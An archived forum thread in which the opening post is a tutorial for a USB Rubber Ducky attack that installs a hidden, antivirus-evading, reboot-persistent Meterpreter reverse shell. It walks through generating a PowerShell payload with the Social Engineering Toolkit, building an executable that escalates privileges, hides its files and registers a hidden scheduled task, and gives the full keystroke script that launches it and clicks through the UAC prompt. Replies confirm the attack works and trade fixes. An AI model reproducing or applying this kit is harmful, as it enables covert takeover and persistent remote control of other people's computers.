Jump to content

Archived

This topic is now archived and is closed to further replies.

chaz

Hidden/Undetected/Reboot persistent Meterpreter in under 5 seconds w/Smart privilege escalation

Recommended Posts

Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :)  I've created a ducky script and coded an executable which will achieve the title of this topic.  This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar.  Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later).  

 

What the executable does:

-  Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user.

-  Depending on privilege level, either continue execution or attempt to elevate.

(-  If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y')

-  Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden.

-  Creates a hidden Task Scheduler task which runs the executable on each user logon.

-  Executes encoded Powershell payload.

 

Why smart privilege checking is important:

If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear:

LHDfV.png     

This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right?  This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell.  Now if a user is part of the admin group then we see a dialog like this:

0-disable-uac-user-account-control-promp

This is where we'd like our ducky script to hit 'ALT Y' and bam!  We can then just use meterpreters 'getsystem' command and we're away!

Tutorial:

What you'll need:

-  Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).

-  Linux based PC/VM for generating our payload/listening for connections.  Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload.

-  USB Rubber ducky (with Twin Duck or similar firmware installed)

-  This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html  (On your Windows PC/VM, unzip it before)

 

Let's start:

-  On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.

-  You will be presented with various options, hit '1' and then enter.

-  Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter.

-  More options, hit '1' and then enter.

-  Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding)

-  Give it a port and then say 'yes' when it asks if you want to start the listener.

-  Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/'

-  You have just started a webserver on port 80.  Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt'

You should be faced with this screen: 

22653e08a313d5d83e4402239d28b71f.png

-  Select all the text and copy it.

-  Open Visual Studio and click 'Open Project'.  Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:

5af6df8e010eb680cac89f51aa1ef974.png

-  Go to the line with the pre-inserted Powershell payload (Line 64):

674cc248205db1fefc0a1ed79ab3cc16.png 

-  Replace the text within the double quotes with your payload you got from the web server earlier.

-  Go to the build menu at the top and click 'Build Solution'.  Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. 

-  Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need.

-  Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive.

-  Now we need our ducky payload, here is the code:

REM Awesome script
DELAY 500
GUI R
DELAY 50
STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
DELAY 50
ENTER
DELAY 1500
ALT Y
DELAY 1000
STRING exit
DELAY 50
ENTER
DELAY 50
STRING exit
DELAY 50
ENTER

-  Generate your inject.bin file with an encoder.

-  Copy the inject.bin to your Ducky's drive and there we have it!

 

Some caveats:

-  The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script.

-  Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works!

 

So tell me what you think, feedback is greatly appreciated!

Share this post


Link to post
Share on other sites

I should add, since we are using Windows Task Scheduler, if we do get elevated privileges, when the user reboots and the 'PSExec.exe' file auto runs it will run as Admin and no UAC prompt will be shown because technically when we added the Task we were admin :)

Share this post


Link to post
Share on other sites

The payload works (except i had to change the powershell execution to use  Process not the Powershell - because win7 threw a exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand so you can swap the payload easily without needing to recompile the PSExec everytime which may not be possible everytime.

Thanks nice idea :) It works a exspected you will get Sys Privs easily (except for Win10 which may be a MSF Problem) and the payload stays persistent with SysPrivs after reboot.

Nice work ;)

 

Share this post


Link to post
Share on other sites
3 hours ago, Shonenx333 said:

The payload works (except i had to change the powershell execution to use  Process not the Powershell - because win7 threw a exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand so you can swap the payload easily without needing to recompile the PSExec everytime which may not be possible everytime.

Thanks nice idea :) It works a exspected you will get Sys Privs easily (except for Win10 which may be a MSF Problem) and the payload stays persistent with SysPrivs after reboot.

Nice work ;)

 

Good to hear!  Glad you got it working on Windows 7, and yeah having the script as an external resource to load at runtime is probably a better idea!  Interestingly I had no issues with System Privs and Windows 10, I just executed 'getsystem' in my meterpreter prompt and I got elevated (even after reboot).

 

Thanks for your kind words :)

Share this post


Link to post
Share on other sites

This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip, you need to escape quotation marks if they appear in your script. Like so:

pInstance.AddScript("powershell -w 1 -C \"sv SS...." 

Or it won't compile correctly.

 

 

Thanks for this. I will update later.

Share this post


Link to post
Share on other sites
1 hour ago, mrdeep said:

This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip, you need to escape quotation marks if they appear in your script. Like so:


pInstance.AddScript("powershell -w 1 -C \"sv SS...." 

Or it won't compile correctly.

 

 

Thanks for this. I will update later.

Yeah definitely, though all the powershell scripts that I've generated with S.E.T don't have any quotation marks, but for non-programmers, a very good tip!

Share this post


Link to post
Share on other sites

Everything works except the persistence. Cant get that to work for some reason.. Do you know how to fix this?

Nice script though chaz!!

Share this post


Link to post
Share on other sites
4 hours ago, henna3 said:

Everything works except the persistence. Cant get that to work for some reason.. Do you know how to fix this?

Nice script though chaz!!

The reboot persistence?  I don't mean that if a session dies it will come back to life, it will just execute again when rebooted.  If you could check task scheduler to see if a task is created and get back to me that would be awesome!  And thanks btw :)

Share this post


Link to post
Share on other sites

Sir 

I have tried this payload on my computer

Can I please know how to remove the persistence?

Thanks!

Share this post


Link to post
Share on other sites
27 minutes ago, qwe3 said:

Sir 

I have tried this payload on my computer

Can I please know how to remove the persistence?

Thanks!

Go to Windows Task Schedulre and delete the Task "Update"

Share this post


Link to post
Share on other sites

Thanks sir

There's one problem

After the PSExec.exe has started, it says the windows powershell stop working.

Output:

1>------ Build started: Project: PSExec, Configuration: Release Any CPU ------
1>C:\Program Files (x86)\MSBuild\12.0\bin\Microsoft.Common.CurrentVersion.targets(1697,5): warning MSB3088: Could not read state file "obj\Release\PSExec.csprojResolveAssemblyReference.cache". Unable to find assembly 'Microsoft.Build.Tasks.Core, Version=14.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'.
1>  PSExec -> C:\Users\xxx\Desktop\PSExec\PSExec\bin\Release\PSExec.exe
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
 

Share this post


Link to post
Share on other sites
On 10/16/2017 at 9:43 AM, dacrydium said:

Hi ,

Thank you for  this project, but the link for the visual project is dead , can you reupload it please ?

q8

Share this post


Link to post
Share on other sites

I can successfully compile the project using the instructions above. It outputs the file PSExec.exec successfully, yet it doesn't output the files Microsoft.Win32.TaskScheduler.dll and JetBrains.Annotations.dll. Shouldn't they be in the same folder as the newly made PSExec? Anybody still using this method that can help?

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...